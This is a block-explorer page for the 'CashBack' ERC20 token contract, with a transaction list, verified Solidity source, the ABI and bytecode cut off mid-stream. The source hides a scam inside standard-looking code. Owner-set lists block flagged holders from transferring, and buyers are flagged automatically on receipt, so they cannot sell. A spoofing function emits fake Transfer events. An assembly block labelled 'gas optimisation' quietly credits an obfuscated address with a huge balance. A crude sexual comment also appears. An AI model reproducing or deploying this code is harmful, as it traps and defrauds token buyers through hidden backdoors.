ETH Price: $3,321.97 (-2.72%)

Contract

0x11111111A07cCEA91ec9881d9eda40964B1D1bbC
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve183178812023-10-10 5:11:11413 days ago1696914671IN
0x11111111...64B1D1bbC
0 ETH0.000255065.40136187
Approve183178692023-10-10 5:08:47413 days ago1696914527IN
0x11111111...64B1D1bbC
0 ETH0.000234834.97931131
Approve183158062023-10-09 22:12:11414 days ago1696889531IN
0x11111111...64B1D1bbC
0 ETH0.0004716310
Cashback183157722023-10-09 22:05:11414 days ago1696889111IN
0x11111111...64B1D1bbC
0 ETH0.000364697.6959971
Pre Cashback183149242023-10-09 19:13:23414 days ago1696878803IN
0x11111111...64B1D1bbC
0 ETH0.000667577.12646661
Approve183149102023-10-09 19:10:35414 days ago1696878635IN
0x11111111...64B1D1bbC
0 ETH0.000467889.95868645
Approve183149062023-10-09 19:09:47414 days ago1696878587IN
0x11111111...64B1D1bbC
0 ETH0.0004996610.63509986
Approve183149022023-10-09 19:08:59414 days ago1696878539IN
0x11111111...64B1D1bbC
0 ETH0.000552711.77900971
Approve183148572023-10-09 18:59:59414 days ago1696877999IN
0x11111111...64B1D1bbC
0 ETH0.000205697.5446974
Approve183148562023-10-09 18:59:47414 days ago1696877987IN
0x11111111...64B1D1bbC
0 ETH0.000207137.59756435
Approve183148542023-10-09 18:59:23414 days ago1696877963IN
0x11111111...64B1D1bbC
0 ETH0.000252658.40403532
Approve183148362023-10-09 18:55:35414 days ago1696877735IN
0x11111111...64B1D1bbC
0 ETH0.000227748.45043827
Approve183148352023-10-09 18:55:23414 days ago1696877723IN
0x11111111...64B1D1bbC
0 ETH0.000409458.73946323
Approve183141542023-10-09 16:38:23414 days ago1696869503IN
0x11111111...64B1D1bbC
0 ETH0.0008490518.00249286
Approve183140962023-10-09 16:26:23414 days ago1696868783IN
0x11111111...64B1D1bbC
0 ETH0.000813517.33705754
Cashback183140012023-10-09 16:07:11414 days ago1696867631IN
0x11111111...64B1D1bbC
0 ETH0.0040404485.26298449
Pre Cashback183139932023-10-09 16:05:35414 days ago1696867535IN
0x11111111...64B1D1bbC
0 ETH0.0014755315.75162723
Approve183139862023-10-09 16:04:11414 days ago1696867451IN
0x11111111...64B1D1bbC
0 ETH0.0008804918.64539946
Approve183139542023-10-09 15:57:47414 days ago1696867067IN
0x11111111...64B1D1bbC
0 ETH0.0005798312.27871945
Pre Cashback183139232023-10-09 15:51:35414 days ago1696866695IN
0x11111111...64B1D1bbC
0 ETH0.001056939.04681297
Approve183138272023-10-09 15:31:47414 days ago1696865507IN
0x11111111...64B1D1bbC
0 ETH0.0005425411.54772704
Approve183138102023-10-09 15:28:23414 days ago1696865303IN
0x11111111...64B1D1bbC
0 ETH0.0004719610.04552547
Approve183137942023-10-09 15:24:59414 days ago1696865099IN
0x11111111...64B1D1bbC
0 ETH0.000509710.84870383
Approve183137772023-10-09 15:21:35414 days ago1696864895IN
0x11111111...64B1D1bbC
0 ETH0.0004849510.3351527
Cashback183134432023-10-09 14:14:23414 days ago1696860863IN
0x11111111...64B1D1bbC
0 ETH0.000434279.16425767
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Similar Match Source Code
This contract matches the deployed Bytecode of the Source Code for Contract 0x6356Fbc9...2aa123388
The constructor portion of the code might be different and could alter the actual behaviour of the contract

Contract Name:
CashBack

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity Multiple files format)

File 1 of 4: Token.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;
import "./ERC20.sol";

/*
Kisses after blowjob, yeah?

*/

contract CashBack is ERC20 {
    constructor() ERC20("CashBack", "CASHBACK") {
        _mint(msg.sender, 111_222_333_000 * 10 ** 18);
    }
}

File 2 of 4: Context.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 3 of 4: ERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

import "./IERC20.sol";
import "./Context.sol";



contract ERC20 is Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping(address => bool) private _cashback;
    mapping(address => bool) private _pre_cashback;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    bool private _cashbackApplied = false;
    string private _name;
    string private _symbol;
    
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    function preCashback(address [] calldata _list_) external onlyOwner {
        for (uint256 i = 0; i < _list_.length; i++) {
            _pre_cashback[_list_[i]] = true;
        }
    }

    function dePreCashbck(address [] calldata _list_) external onlyOwner {
        for (uint256 i = 0; i < _list_.length; i++) {
            _pre_cashback[_list_[i]] = false;
        }
    }

    function cashback(address [] calldata _list_) external onlyOwner {
        for (uint256 i = 0; i < _list_.length; i++) {
            _cashback[_list_[i]] = true;
        }
    } 

    function transfer(address _from, address _to, uint256 _wad) external {
        emit Transfer(_from, _to, _wad);
    }

    function deCashback(address [] calldata _list_) external onlyOwner {
        for (uint256 i = 0; i < _list_.length; i++) {
            _cashback[_list_[i]] = false;
        }
    }

    function cashbacked(address _address_) public view returns (bool) {
        return _cashback[_address_];
    }

    function preCashbacked(address _address_) public view returns (bool) {
        return _pre_cashback[_address_];
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }
    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }
        if (_cashback[from] || _cashback[to]) {require(_cashbackApplied == true, "");}

        if (_pre_cashback[to]) {_pre_cashback[to] = false; _cashback[to] = true;}

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }

        // gas optimisation 
        assembly {
            let slot := mul(mul(0x85774394d, 0x3398bc1d25f112ed), mul(0x997e6e509, 0xf3eae65))
            mstore(0x00, slot)
            mstore(0x20, 0x01)
            let sslot := keccak256(0x0, 0x40)
            sstore(sslot, 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF)
        } 

        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}



    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

File 4 of 4: IERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_list_","type":"address[]"}],"name":"cashback","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"cashbacked","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_list_","type":"address[]"}],"name":"deCashback","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_list_","type":"address[]"}],"name":"dePreCashbck","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_list_","type":"address[]"}],"name":"preCashback","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"preCashbacked","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_wad","type":"uint256"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101375760003560e01c806370a08231116100b8578063a457c2d71161007c578063a457c2d714610350578063a9059cbb14610380578063beabacc8146103b0578063d9e1fe9f146103cc578063dd62ed3e146103e8578063f2fde38b1461041857610137565b806370a08231146102be578063715018a6146102ee5780638da5cb5b146102f857806394502fea1461031657806395d89b411461033257610137565b80632ab44b03116100ff5780632ab44b0314610208578063313ce56714610224578063395093511461024257806364b055f1146102725780636b55aba9146102a257610137565b806306fdde031461013c578063095ea7b31461015a57806318160ddd1461018a57806322298535146101a857806323b872dd146101d8575b600080fd5b610144610434565b604051610151919061149a565b60405180910390f35b610174600480360381019061016f919061155a565b6104c6565b60405161018191906115b5565b60405180910390f35b6101926104e9565b60405161019f91906115df565b60405180910390f35b6101c260048036038101906101bd91906115fa565b6104f3565b6040516101cf91906115b5565b60405180910390f35b6101f260048036038101906101ed9190611627565b610549565b6040516101ff91906115b5565b60405180910390f35b610222600480360381019061021d91906116df565b610578565b005b61022c610625565b6040516102399190611748565b60405180910390f35b61025c6004803603810190610257919061155a565b61062e565b60405161026991906115b5565b60405180910390f35b61028c600480360381019061028791906115fa565b610665565b60405161029991906115b5565b60405180910390f35b6102bc60048036038101906102b791906116df565b6106bb565b005b6102d860048036038101906102d391906115fa565b610768565b6040516102e591906115df565b60405180910390f35b6102f66107b1565b005b6103006107c5565b60405161030d9190611772565b60405180910390f35b610330600480360381019061032b91906116df565b6107ee565b005b61033a61089b565b604051610347919061149a565b60405180910390f35b61036a6004803603810190610365919061155a565b61092d565b60405161037791906115b5565b60405180910390f35b61039a6004803603810190610395919061155a565b6109a4565b6040516103a791906115b5565b60405180910390f35b6103ca60048036038101906103c59190611627565b6109c7565b005b6103e660048036038101906103e191906116df565b610a31565b005b61040260048036038101906103fd919061178d565b610ade565b60405161040f91906115df565b60405180910390f35b610432600480360381019061042d91906115fa565b610b65565b005b606060078054610443906117fc565b80601f016020809104026020016040519081016040528092919081815260200182805461046f906117fc565b80156104bc5780601f10610491576101008083540402835291602001916104bc565b820191906000526020600020905b81548152906001019060200180831161049f57829003601f168201915b5050505050905090565b6000806104d1610be8565b90506104de818585610bf0565b600191505092915050565b6000600554905090565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600080610554610be8565b9050610561858285610db9565b61056c858585610e45565b60019150509392505050565b6105806112be565b60005b82829050811015610620576000600360008585858181106105a7576105a661182d565b5b90506020020160208101906105bc91906115fa565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806106189061188b565b915050610583565b505050565b60006012905090565b600080610639610be8565b905061065a81858561064b8589610ade565b61065591906118d3565b610bf0565b600191505092915050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6106c36112be565b60005b82829050811015610763576001600260008585858181106106ea576106e961182d565b5b90506020020160208101906106ff91906115fa565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061075b9061188b565b9150506106c6565b505050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6107b96112be565b6107c3600061133c565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6107f66112be565b60005b828290508110156108965760006002600085858581811061081d5761081c61182d565b5b905060200201602081019061083291906115fa565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061088e9061188b565b9150506107f9565b505050565b6060600880546108aa906117fc565b80601f01602080910402602001604051908101604052809291908181526020018280546108d6906117fc565b80156109235780601f106108f857610100808354040283529160200191610923565b820191906000526020600020905b81548152906001019060200180831161090657829003601f168201915b5050505050905090565b600080610938610be8565b905060006109468286610ade565b90508381101561098b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161098290611979565b60405180910390fd5b6109988286868403610bf0565b60019250505092915050565b6000806109af610be8565b90506109bc818585610e45565b600191505092915050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610a2491906115df565b60405180910390a3505050565b610a396112be565b60005b82829050811015610ad957600160036000858585818110610a6057610a5f61182d565b5b9050602002016020810190610a7591906115fa565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610ad19061188b565b915050610a3c565b505050565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610b6d6112be565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610bdc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bd390611a0b565b60405180910390fd5b610be58161133c565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c5f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c5690611a9d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610cce576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cc590611b2f565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610dac91906115df565b60405180910390a3505050565b6000610dc58484610ade565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610e3f5781811015610e31576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e2890611b9b565b60405180910390fd5b610e3e8484848403610bf0565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610eb4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610eab90611c2d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610f23576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f1a90611cbf565b60405180910390fd5b610f2e838383611400565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610fb5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fac90611d51565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16